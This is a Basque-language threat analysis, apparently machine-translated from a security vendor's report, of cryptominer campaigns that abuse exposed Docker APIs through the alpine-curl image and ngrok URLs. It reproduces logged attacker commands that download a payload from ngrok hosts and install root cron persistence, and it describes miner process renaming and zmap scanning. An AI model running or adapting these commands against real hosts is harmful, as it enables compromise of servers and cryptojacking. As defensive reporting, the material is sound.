Bildutako datuak mehatxuen jarraipena egiteko sortu ditugun honeypot ontziak erabiliz aztertu ditugu. Eta jarduera garrantzitsua detektatu dugu nahi ez diren edo baimendu gabeko kripto-moneta meatzarien edukiontzi maltzur gisa zabalduta komunitateak Docker Hub-en argitaratutako irudi bat erabiliz. Irudia kriptografia-moneta-meatzari gaiztoak eskaintzen dituen zerbitzu baten zati gisa erabiltzen da.
Gainera, sareekin lan egiteko programak instalatzen dira aldameneko edukiontzi eta aplikazio irekietan sartzeko.
Gure honeypotak bere horretan uzten ditugu, hau da, ezarpen lehenetsiekin, inolako segurtasun-neurririk gabe edo ondoren software gehigarririk instalatu gabe. Kontuan izan Docker-ek hasierako konfiguraziorako gomendioak dituela akatsak eta ahultasun sinpleak saihesteko. Baina erabiltzen diren honeypotak edukiontziak dira, edukiontzien plataformari zuzendutako erasoak detektatzeko diseinatuak, ez edukiontzi barruko aplikazioak.
Detektaturiko jarduera gaiztoa ere nabarmena da ahultasunik behar ez duelako eta Docker bertsiotik independentea baita. Gaizki konfiguratuta, eta, beraz, irekita dagoen edukiontziaren irudia aurkitzea da erasotzaileek zerbitzari ireki asko kutsatzeko behar duten guztia.
Itxi gabeko Docker APIari esker, erabiltzaileak aukera zabala egin dezake , exekutatzen ari diren edukiontzien zerrenda lortzea barne, edukiontzi zehatz batetik erregistroak jasotzea, abiaraztea, gelditzea (behartua barne) eta baita konfigurazio zehatzak dituen irudi zehatz batetik edukiontzi berri bat sortzea ere.
Ezkerrean malwarea bidaltzeko metodoa dago. Eskuinean erasotzailearen ingurunea dago, eta horrek irudiak urrutiko zabaltzea ahalbidetzen du.
3762 Docker API irekien herrialdeen araberako banaketa. 12.02.2019/XNUMX/XNUMXko Shodan bilaketan oinarrituta
Eraso-katearen eta kargaren aukerak
Ezti-ontzien laguntzarekin ez ezik, jarduera kaltegarria detektatu zen. Shodan-en datuek erakusten dutenez, agerian dauden Docker APIen kopurua (ikus bigarren grafikoa) handitu egin da, gaizki konfiguratutako edukiontzi bat ikertu genuenetik, Monero kriptomoneta meatzaritza softwarea zabaltzeko zubi gisa erabiltzen dena. Iazko urrian (2018, egungo datuak gutxi gorabehera. itzultzailea) 856 API ireki baino ez zeuden.
Honeypot-en erregistroen azterketak erakutsi zuen edukiontzien irudiaren erabilera ere lotzen zela erabilerarekin , konexio seguruak ezartzeko edo trafikoa publikoki irisgarriak diren puntuetatik zehaztutako helbide edo baliabideetara (adibidez, localhost) birbidaltzeko tresna. Horri esker, erasotzaileek URLak modu dinamikoan sor ditzakete karga zerbitzari ireki batera bidaltzen dutenean. Jarraian, ngrok zerbitzuaren erabilera okerra erakusten duten erregistroetako kode adibideak daude:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Ikus dezakezunez, kargatutako fitxategiak etengabe aldatzen diren URLetatik deskargatzen dira. URL hauek iraungitze-data laburra dute, beraz, ezin dira deskargatu kargak iraungitze-dataren ondoren.
Bi karga aukera daude. Lehenengoa Linux-erako ELF meatzari konpilatua da (Coinminer.SH.MALXMR.ATNO gisa definitua) meatzaritza-igerilekuarekin konektatzen dena. Bigarrena script bat da (TrojanSpy.SH.ZNETMAP.A) sare-barrutiak eskaneatzeko eta, ondoren, helburu berriak bilatzeko erabiltzen diren sare-tresna jakin batzuk lortzeko diseinatua.
Dropper script-ak bi aldagai ezartzen ditu, gero kriptografia-moneta meatzaria zabaltzeko erabiltzen direnak. HOST aldagaiak fitxategi gaiztoak dauden URLa dauka, eta RIP aldagaiak inplementatu beharreko meatzariaren fitxategi-izena (hain zuzen ere, hash-a) da. HOST aldagaia hash aldagaia aldatzen den bakoitzean aldatzen da. Gidoia erasotutako zerbitzarian beste kriptografia-moneta-meatzaririk ez dagoela egiaztatzen saiatzen da.
HOST eta RIP aldagaien adibideak, baita beste meatzaririk ez dagoela exekutatzen egiaztatzeko erabiltzen den kode zati bat ere
Meatzaria hasi aurretik, nginx izena jartzen zaio. Script honen beste bertsio batzuen izena aldatuko zaio meatzariari Linux inguruneetan egon daitezkeen legezko beste zerbitzu batzuetara. Hau nahikoa izan ohi da martxan dauden prozesuen zerrendako egiaztapenak saihesteko.
Bilaketa-gidoiak ere ezaugarriak ditu. URL zerbitzu berarekin funtzionatzen du beharrezko tresnak zabaltzeko. Horien artean zmap binarioa dago, sareak eskaneatzeko eta irekitako portuen zerrenda lortzeko erabiltzen dena. Scriptak beste bitar bat ere kargatzen du, aurkitutako zerbitzuekin elkarreragiteko eta haietatik pankartak jasotzeko erabiltzen dena, aurkitutako zerbitzuari buruzko informazio gehigarria zehazteko (adibidez, bere bertsioa).
Scriptak eskaneatu beharreko sare barruti batzuk aldez aurretik zehazten ditu, baina hori scriptaren bertsioaren araberakoa da. Era berean, zerbitzuen xede-atalak ezartzen ditu (kasu honetan, Docker) eskaneatu aurretik.
Helburu posibleak aurkitu bezain laster, pankartak automatikoki kentzen dira haietatik. Scriptak helburuak iragazten ditu interesgarri diren zerbitzu, aplikazio, osagai edo plataformen arabera: Redis, Jenkins, Drupal, MODX, , Docker 1.16 bezeroa eta Apache CouchDB. Eskaneatutako zerbitzaria horietakoren batekin bat badator, testu-fitxategi batean gordetzen da, eta erasotzaileek gero erabil dezaketen analisi eta hackeatzeko. Testu-fitxategi hauek erasotzaileen zerbitzarietara kargatzen dira esteka dinamikoen bidez. Hau da, fitxategi bakoitzeko URL bereizia erabiltzen da, eta horrek esan nahi du gerora sarbidea zaila dela.
Eraso-bektorea Docker irudi bat da, hurrengo bi kodeetan ikus daitekeen bezala.
Goiko aldean legezko zerbitzu batera izena aldatzea dago, eta behealdean zmap sareak eskaneatzeko nola erabiltzen den dago.
Goiko aldean aurrez definitutako sare barrutiak daude, behean zerbitzuak bilatzeko ataka zehatzak, Docker barne.
Pantaila-argazkiak erakusten du alpetar kizkur irudia 10 milioi aldiz baino gehiago deskargatu dela
Alpine Linux eta curl-en oinarrituta, hainbat protokolotan fitxategiak transferitzeko baliabideen eraginkorra den CLI tresna bat eraiki dezakezu. . Aurreko irudian ikus dezakezun bezala, irudi hau dagoeneko 10 milioi aldiz baino gehiago deskargatu da. Deskarga-kopuru handi batek irudi hau sarrera-puntu gisa erabiltzea esan nahi du; irudi hau duela sei hilabete baino gehiago eguneratu zen; erabiltzaileek ez zuten maiz deskargatu biltegi honetatik beste irudi batzuk. Docker-en - edukiontzi bat exekutatzeko konfiguratzeko erabiltzen den argibide multzoa. Sarrera puntuaren ezarpenak okerrak badira (adibidez, edukiontzia Internetetik irekita uzten da), irudia eraso-bektore gisa erabil daiteke. Erasotzaileek erabil dezakete karga bat emateko, gaizki konfiguratuta edo irekita dagoen edukiontzi bat onartzen ez dela aurkitzen badute.
Garrantzitsua da irudi hau (alpine-curl) bera ez dela gaiztoa, baina goian ikus dezakezun bezala, funtzio maltzurrak betetzeko erabil daiteke. Dockerren antzeko irudiak jarduera kaltegarriak egiteko ere erabil daitezke. Dockerrekin harremanetan jarri gara eta haiekin lan egin dugu gai honetan.
Gomendioak
aztarnak enpresa askorentzat, batez ere inplementatzen ari direnentzat , garapen eta entrega azkarrean zentratua. Dena areagotu egiten da auditoretza- eta jarraipen-arauak bete beharrak, datuen konfidentzialtasuna kontrolatu beharrak, baita horiek ez betetzeak eragindako kalte izugarriak ere. Segurtasun-automatizazioa garapenaren bizi-zikloan sartzeak, bestela detektatu gabe geratuko liratekeen segurtasun-zuloak aurkitzen laguntzen dizu, baizik eta alferrikako lan-karga murrizten laguntzen dizu, hala nola, aplikazio bat zabaldu ondoren aurkitutako ahultasun edo konfigurazio oker bakoitzerako software osagarriak exekutatzen.
Artikulu honetan eztabaidatutako gertakariak segurtasuna hasieratik kontuan hartu beharra nabarmentzen du, honako gomendio hauek barne:
- Sistema-administratzaileentzat eta garatzaileentzat: egiaztatu beti zure APIaren ezarpenak, zerbitzari edo barne-sare jakin bateko eskaerak soilik onartzeko konfiguratuta dagoela ziurtatzeko.
- Jarraitu eskubide gutxienen printzipioa: ziurtatu edukiontzien irudiak sinatuta eta egiaztatuta daudela, mugatu osagai kritikoetarako sarbidea (edukiontzia abiarazteko zerbitzua) eta gehitu enkriptatzea sareko konexioei.
- Jarraitu eta segurtasun mekanismoak gaitu, adibidez. eta barneratua .
- Erabili exekuzio-denboraren eta irudien eskaneatu automatizatua edukiontzian exekutatzen diren prozesuei buruzko informazio gehigarria lortzeko (adibidez, spoofing-a detektatzeko edo ahuleziak bilatzeko). Aplikazioen kontrolak eta osotasunaren monitorizazioak zerbitzarietan, fitxategietan eta sistema-eremuetan izandako aldaketa anormalen jarraipena egiten laguntzen dute.
Trendmicro-k DevOps taldeei modu seguruan eraikitzen, azkar zabaltzen eta edonon abiarazten laguntzen die. Trend Micro Segurtasun indartsua, erraztua eta automatizatua eskaintzen du erakunde baten DevOps kanalizazioan eta hainbat mehatxu-defentsa eskaintzen ditu lan-karga fisikoak, birtualak eta hodeiko exekuzioan babesteko. Edukiontzien segurtasuna ere gehitzen du и , Docker edukiontzien irudiak eskaneatzen dituzten malware eta ahultasunen bila garapen-bideko edozein unetan, mehatxuak ekiditeko zabaldu aurretik.
Konpromisoaren seinaleak
Erlazionatutako hashak:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
On Hizlariek praktikatzen dutenek erakusten dute zer ezarpen egin behar diren lehenik, aukera gutxitzeko edo goian azaldutako egoera guztiz saihesteko. Eta abuztuaren 19tik 21era sareko intentsiboan Segurtasun-arazo horiek eta antzekoak lankideekin eta irakasle jardunean eztabaida ditzakezu mahai-inguru batean, non guztiek hitz egin eta esperientziadun lankideen minak eta arrakastak entzun ditzaketen.
Iturria: www.habr.com